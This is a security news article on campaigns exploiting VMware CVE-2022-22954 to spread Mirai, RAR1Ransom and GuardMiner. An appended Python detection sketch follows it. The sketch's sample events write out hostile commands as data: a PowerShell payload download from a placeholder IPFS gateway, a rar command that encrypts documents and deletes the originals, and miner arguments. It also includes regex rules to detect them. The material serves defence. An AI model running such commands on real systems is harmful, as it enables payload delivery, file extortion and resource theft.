Researchers at FortiGuard Labs noticed multiple malware campaigns targeting the VMware vulnerability to deploy cryptocurrency miners and ransomware on affected machines.
The critical vulnerability is tracked as CVE-2022-22954 (CVSS score: 9.8), a server-side template injection flaw that leads to remote code execution. VMware has patched this vulnerability, but it nevertheless came under active exploitation in the wild.
An attacker can trigger the vulnerability to inject a payload and achieve remote code execution on VMware Workspace ONE Access and Identity Manager.
“Most of the payloads focus on probing a victim’s sensitive data, for example, passwords, hosts file, etc.,” said Fortinet FortiGuard Labs.
“They had the intention of deploying Mirai targeting exposed networking devices running Linux, RAR1ransom that leverages legitimate WinRAR to deploy encryption and GuardMiner that is a variant of xmrig used to ‘mine’ Monero.”
Researchers say this Mirai variant's purpose is to launch DoS and brute-force attacks, like most Mirai botnets.
Reports say the distribution of RAR1Ransom and GuardMiner is achieved by means of a PowerShell or a shell script depending on the operating system.
RAR1ransom is prominent for leveraging the legitimate WinRAR utility to lock files in password-protected archives.
The PowerShell script downloads the following files from a Cloudflare IPFS gateway:
RAR1Ransom is a ransomware tool that abuses WinRAR to compress the victim’s files and lock them with a password. GuardMiner is a cross-platform mining Trojan, which has been active since 2020.
RAR1Ransom targets a compromised victim’s file with particular extensions.
“We can tell the attacker intends to utilize a victim’s resources as much as possible, not only to install RAR1Ransom for extortion, but also to spread GuardMiner to collect cryptocurrency,” said Fortinet FortiGuard Labs.
Therefore, users are advised to keep their systems updated and patched and be aware of any suspicious processes in the environment.
“These Mirai variants, RAR1Ransom, and GuardMiner are not extremely complicated samples, but their methods are always changing and evolving”, concludes the report.
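The advice above to watch for suspicious processes can be turned into concrete detection logic for the three behaviours this article describes: a script pulling payloads from an IPFS gateway, WinRAR being driven from the command line to build password-protected archives (the RAR1Ransom technique), and an xmrig-style miner (GuardMiner). The following Python is an added example written for this page, not code from Fortinet or from the report; the process-creation events, host names, URL, wallet and password values are all constructed, and the rar switches it keys on (`-p`, `-hp` for encryption, `-df` for delete-after-archive) are the standard rar command-line switches, which is an assumption about how the tool is invoked rather than something the article states.

```python
"""Detection sketch for the post-exploitation chain described in the article:
IPFS-gateway downloads, WinRAR password-protected archiving and a cryptominer.
All sample events below are constructed for this example."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    severity: str
    image: str


# Constructed process-creation events: (host, parent_image, image, command_line).
# Host names, the gateway URL, the CID, the password and the wallet are placeholders.
SAMPLE_EVENTS = [
    ("ws1-access-01", "cmd.exe", "powershell.exe",
     'powershell -c "iwr https://ipfs-gateway.example/ipfs/EXAMPLE_CID/r.exe '
     '-OutFile C:\\Users\\Public\\r.exe"'),
    ("ws1-access-01", "cmd.exe", "rar.exe",
     'rar.exe a -r -ep1 -hpEXAMPLEPASSWORD -df C:\\Users\\Public\\locked.rar '
     'C:\\Users\\alice\\Documents\\*.docx'),
    ("ws1-access-01", "svchost.exe", "guard.exe",
     "guard.exe -o stratum+tcp://pool.invalid:3333 -u EXAMPLEWALLET --donate-level 1"),
    # Benign: a user archiving a folder without a password.
    ("fileserver-02", "explorer.exe", "WinRAR.exe",
     'WinRAR.exe a -r C:\\Users\\bob\\backup.rar C:\\Users\\bob\\Documents\\'),
    ("ws1-access-01", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

DOWNLOADERS = {"powershell.exe", "pwsh.exe", "curl", "wget", "sh", "bash"}
ARCHIVERS = {"rar.exe", "winrar.exe", "rar"}

# Any URL whose path goes through an IPFS gateway (".../ipfs/<cid>/...").
IPFS_URL = re.compile(r"https?://[^\s\"']+/ipfs/[^\s\"']+", re.IGNORECASE)
# Assumed standard rar switches: -p<pw> encrypts data, -hp<pw> also encrypts headers.
RAR_PASSWORD = re.compile(r"(?:^|\s)-h?p\S+", re.IGNORECASE)
# -df deletes source files after archiving: the behaviour that makes this ransomware.
RAR_DELETE = re.compile(r"(?:^|\s)-df(?:\s|$)", re.IGNORECASE)
# Typical xmrig-style miner arguments (stratum pool URI, donate level, binary name).
MINER_HINTS = re.compile(r"stratum\+(?:tcp|ssl)://|--donate-level|xmrig", re.IGNORECASE)


def classify(host: str, parent: str, image: str, cmdline: str):
    """Return a Finding for one process-creation event, or None if it looks benign."""
    img = image.lower()
    if img in DOWNLOADERS and IPFS_URL.search(cmdline):
        return Finding(host, "ipfs_gateway_download", "medium", image)
    if img in ARCHIVERS and RAR_PASSWORD.search(cmdline):
        # Password alone is suspicious; password plus delete-after-archive is the
        # extortion pattern, so escalate.
        sev = "high" if RAR_DELETE.search(cmdline) else "medium"
        return Finding(host, "password_protected_archive", sev, image)
    if MINER_HINTS.search(cmdline):
        return Finding(host, "cryptominer_args", "high", image)
    return None


def scan_events(events):
    """Run every event through classify() and keep the hits, in input order."""
    return [f for f in (classify(*e) for e in events) if f is not None]


def correlate(findings):
    """Hosts showing two or more distinct behaviours: the article's point that the
    attacker stacks ransomware and mining on the same victim."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f.host].add(f.rule)
    return {h: sorted(rules) for h, rules in by_host.items() if len(rules) >= 2}


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h.host:14} {h.severity:6} {h.rule:27} {h.image}")
    print("multi-stage hosts:", correlate(hits))
```

The benign WinRAR backup on `fileserver-02` produces no alert because it carries no password switch, while the three events on `ws1-access-01` each fire a different rule and the host is then surfaced by `correlate()` as a multi-stage compromise. In a real deployment the same three checks map directly onto process-creation telemetry (Sysmon event 1, EDR process events), with the IPFS-gateway rule worth extending to whatever download utilities are normal in your environment.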